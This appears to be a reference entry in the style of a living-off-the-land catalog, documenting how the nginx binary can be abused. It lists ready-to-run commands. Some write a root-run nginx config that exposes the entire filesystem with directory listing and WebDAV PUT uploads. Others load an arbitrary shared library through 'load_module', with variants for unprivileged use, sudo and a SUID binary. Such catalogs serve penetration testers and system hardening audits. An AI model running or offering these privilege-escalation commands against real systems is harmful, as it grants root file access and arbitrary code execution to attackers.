This executable can upload local data.
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
cat >/path/to/temp-file <<EOF
user root;
http {
server {
listen 80;
root /;
autoindex on;
dav_methods PUT;
}
}
events {}
EOF
nginx -c /path/to/temp-file
This executable can download remote data.
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
cat >/path/to/temp-file <<EOF
user root;
http {
server {
listen 80;
root /;
autoindex on;
dav_methods PUT;
}
}
events {}
EOF
nginx -c /path/to/temp-file
This executable can load shared libraries that may be used to run arbitrary code in the same execution context.
This function can be performed by any unprivileged user.
cat >/path/to/temp-file <<EOF
load_module /path/to/lib.so
EOF
nginx -t -c /path/to/temp-file
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
cat >/path/to/temp-file <<EOF
load_module /path/to/lib.so
EOF
nginx -t -c /path/to/temp-file
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
cat >/path/to/temp-file <<EOF
load_module /path/to/lib.so
EOF
nginx -t -c /path/to/temp-file